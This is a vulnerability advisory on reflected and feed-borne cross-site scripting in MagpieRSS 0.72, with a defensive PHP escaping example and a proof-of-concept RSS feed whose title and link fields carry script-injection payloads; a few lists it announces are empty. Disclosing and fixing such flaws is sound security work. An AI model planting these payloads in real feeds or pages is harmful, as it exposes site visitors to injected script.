MagpieRSS Multiple XSS Vulnerabilities
MagpieRSS (http://magpierss.sourceforge.net) is a PHP-based RSS parser. Its project page describes it as follows: "MagpieRSS is compatible with RSS 0.9 through RSS 1.0. Also parses RSS 1.0's modules, RSS 2.0, and Atom. (with a few exceptions)." Magpie is frequently bundled as a component of other PHP applications, so vulnerabilities in Magpie have security implications for every application that embeds it. Magpie suffers from multiple cross site scripting (XSS) vulnerabilities, which fall into two classes. The first class is caused by the sample scripts shipped with the MagpieRSS distribution failing to sanitize URL parameters: the $url variable is built from $_GET['url'] and echoed back to the user, unescaped, in:
The file magpierss-0.72/scripts/magpie_slashbox.php echoes the same $url variable in the same way, but populates it from $_GET['rss_url'] instead.
The second class of XSS results from MagpieRSS' failure to sanitize any of the content of the feeds it retrieves through magpierss-0.72/rss_fetch.inc. Titles, links and descriptions are handed to the calling application exactly as they appear in the feed, so a malicious feed can inject script into any page that renders the parsed feed data without escaping it itself.
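Both classes have the same root cause: an untrusted string (the query-string URL in the first case, the feed fields in the second) reaches HTML output without escaping. The following is an added example, not code from MagpieRSS or its sample scripts, showing how a consuming application can handle both. It assumes fetch_rss() returns an object whose ->channel is an array and whose ->items is an array of arrays keyed by 'title', 'link' and 'description', which is how the 0.72 sample scripts consume it; $feed below is a constructed stand-in for that object carrying the payloads from the proof-of-concept feed further down.

```php
<?php
// Added example (not MagpieRSS code). Assumption: Magpie's fetch_rss() returns an
// object with ->channel (array) and ->items (array of arrays keyed by 'title',
// 'link', 'description'); $feed below is a constructed stand-in for that object.

// Escape a string for insertion into HTML text or a double-quoted attribute.
function h($s) {
    return htmlspecialchars((string)$s, ENT_QUOTES, 'UTF-8');
}

// Allowlist an absolute http/https URL made only of RFC 3986 URL characters.
// javascript:/data: schemes, whitespace, quotes and angle brackets all fail the
// match, and the function returns '' so the caller can drop the link entirely.
function safe_url($u) {
    $u = trim((string)$u);
    $pattern = '/^https?:\/\/[A-Za-z0-9._~:\/?#\[\]@!$&\'()*+,;=%-]+$/';
    return preg_match($pattern, $u) === 1 ? $u : '';
}

// Class 1: the sample scripts echo $_GET['url'] straight into the page.
// Vulnerable pattern (as in the 0.72 scripts):
//   $url = $_GET['url'];
//   echo "<h2>Feed: $url</h2>";
// Hardened: validate the URL, then escape it on output.
function render_feed_header($raw_url) {
    $url = safe_url($raw_url);
    return '<h2>Feed: ' . h($url) . '</h2>';
}

// Class 2: feed fields are rendered as-is. Escape every field and validate links
// before they become href attributes.
function render_item(array $item) {
    $link  = safe_url(isset($item['link']) ? $item['link'] : '');
    $title = h(isset($item['title']) ? $item['title'] : '');
    $desc  = h(isset($item['description']) ? $item['description'] : '');
    $html  = '<li>';
    $html .= $link !== '' ? '<a href="' . h($link) . '">' . $title . '</a>' : $title;
    $html .= ' <p>' . $desc . '</p></li>';
    return $html;
}

// Constructed stand-in for fetch_rss() output with the PoC feed's payloads.
$feed = (object) array(
    'channel' => array('title' => "Justin.MadIrish.net <script>alert('xss title');</script>"),
    'items'   => array(
        array(
            'title'       => "Disturbing<script>alert('xss title');</script> XSS",
            'link'        => "http://justin.madirish.net/node/343 <script>alert('xss link');</script>",
            'description' => 'foobar',
        ),
    ),
);

// Reflected parameter: a URL carrying markup fails safe_url() and is not echoed back;
// a benign URL is echoed with any quotes or angle brackets entity-encoded.
echo render_feed_header("http://example.invalid/<script>alert(1)</script>"), "\n";
echo render_feed_header("http://example.invalid/feed.xml?q=a\"b"), "\n";

// Feed content: script tags in title/description are entity-encoded, and the PoC link
// (which contains a space and injected markup) is dropped instead of rendered.
echo '<h3>' . h($feed->channel['title']) . "</h3>\n<ul>\n";
foreach ($feed->items as $item) {
    echo render_item($item), "\n";
}
echo "</ul>\n";
```

Rejecting rather than sanitizing the link is deliberate: a URL that fails the allowlist is not worth repairing, and silently stripping characters from it would leave open the question of what the remainder points to. The escaping is applied at the point of output rather than inside Magpie's parser so that the application keeps the raw values for non-HTML uses.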
Proof of concept
The following links can be used to trigger XSS in Magpie's sample scripts:
The following malicious RSS feed can be used to exploit Magpie's RSS rendering:
<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xml:base="http://justin.madirish.net" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Justin.MadIrish.net <script>alert('xss title');</script>- Justin's Personal Homepage</title>
    <link>http://justin.madirish.net</link>
    <description>Close personal friends with Evil Eve.</description>
    <language>en</language>
    <item>
      <title>Disturbing<script>alert('xss title');</script> XSS<script>alert('xss title');</script></title>
      <link>http://justin.madirish.net/node/343 <script>alert('xss link');</script></link>
      <description>foobar</description>
      <pubDate>Wed, 04 Mar 2009 13:42:09 +0000</pubDate>
      <dc:creator>justin</dc:creator>
      <guid isPermaLink="false">343 at http://justin.madirish.net </guid>
    </item>
  </channel>
</rss>
Software: MagpieRSS (http://magpierss.sourceforge.net/)
Version Tested: magpierss-0.72